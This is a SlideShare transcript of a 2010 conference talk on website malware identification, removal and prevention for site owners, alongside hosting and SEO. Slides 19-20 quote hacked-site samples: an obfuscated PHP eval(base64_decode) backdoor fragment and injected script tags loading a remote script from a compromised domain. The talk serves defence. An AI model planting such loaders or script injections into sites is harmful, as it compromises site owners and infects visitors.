0
Hosting & SEO
Scott Hendison
Search Commander, Inc.
SEO Automatic
About Scott Hendison
• Began “hosting“ websites in 1997 with one server in
our retail computer store, with standard DSL
• ...
Web Hosting and SEO
• I've been on this panel three times and discussed –
– shared vs. dedicated servers
– Static vs. shar...
Web Hosting and SEO
Speed and Performance
• I “predicted” at Pubcon 2009 that speed will soon matter
for organic, then Mat...
But I‘m Not Talking About Speed
• Far more important
• The #1 killer of websites
• The thing that drives visitors away in ...
Malware
Malware
• Nothing can fully protect users from getting viruses
• Viruses can steal the BEST passwords & logins
• If you do...
Malware identification
• Nearly 15% of “our” sites were hacked in 2010
• Most were self inflicted through laziness and stu...
Malware
• Identification
• Removal
• Prevention
Identification
• You can get notified by a client or customer
• You discover it in a browser or AV warning
• You can see y...
Malware Warnings
Warnings in the SERPS!
Interstitial Page
#1 Conversion Killer
• Nothing hurts you more than if people wont
come to your site in the first place.
• Once you‘ve iden...
Removal
• Most hacks we saw were pretty similar
• Cross Site Scripting (XSS) and SQL Injection
• Adding links and adding h...
Removal
Removal
Removal
• If WMT is no help, then look at files manually
• Use backups and file comparison tools
• Check recent change dat...
Removal
<?php
eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp
KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY
<snip>
XRjaF9hbGwoJyM...
Removal
• Usually index, home, header and footer –
<script
src=http://domainX.ac.jp/course/VIVID.php
></script>
• And in m...
Removal
• Not all that complicated, just tedious.
• Search files for <script src=http:// and make
sure you recognize them ...
Once You‘re Clean
Once You‘re Clean
Write something like this –
Thank you for identifying our malware
problem, and we believe all is now cle...
Once You‘re Clean
• Document your process and improve it
• Get ready to have it happen again
• Begin to protect yourself –...
Prevention
• FTP Passwords
– Don't share FTP access – make new users instead.
– NEVER use a dictionary word in the passwor...
Prevention
• Using a CMS?
• Find the documentation on locking it down
• Do ALL system updates
• Do ALL released security p...
Prevention
• Nearly 8% of all sites are now WordPress*
• We work in Wordpress 95% of the time
• Same thing that makes it g...
Prevention
Prevention
Prevention
Prevention
Prevention
• Total prevention may be impossible. Be prepared!
• Backup restoration sometimes faster than repair
• Hosts ca...
Take-aways
• FAR more important than your SEO
• Dig into Webmaster Tools malware area
• Change all FTP Passwords asap, & c...
Thank You
WordPress Lunch Table Thursday 1:30
Scott Hendison
Search Commander, Inc.
shendison@seoautomatic.com
Upcoming SlideShare
Loading in...5
×

2010 11 pubcon_hendison-hosting

669

Published on

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

Published in: Technology, Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
669
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "2010 11 pubcon_hendison-hosting"

  1. 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  2. 2. About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  3. 3. Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
  4. 4. Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
  5. 5. But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
  6. 6. Malware
  7. 7. Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
  8. 8. Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
  9. 9. Malware • Identification • Removal • Prevention
  10. 10. Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
  11. 11. Malware Warnings
  12. 12. Warnings in the SERPS!
  13. 13. Interstitial Page
  14. 14. #1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
  15. 15. Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
  16. 16. Removal
  17. 17. Removal
  18. 18. Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
  19. 19. Removal <?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY <snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203 Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK CRfUE9TVFsnZSddKSk7')); ?> (<snipped> goes on for dozens of lines )
  20. 20. Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
  21. 21. Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  22. 22. Once You‘re Clean
  23. 23. Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
  24. 24. Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
  25. 25. Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
  26. 26. Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
  27. 27. Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
  28. 28. Prevention
  29. 29. Prevention
  30. 30. Prevention
  31. 31. Prevention
  32. 32. Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
  33. 33. Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
  34. 34. Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×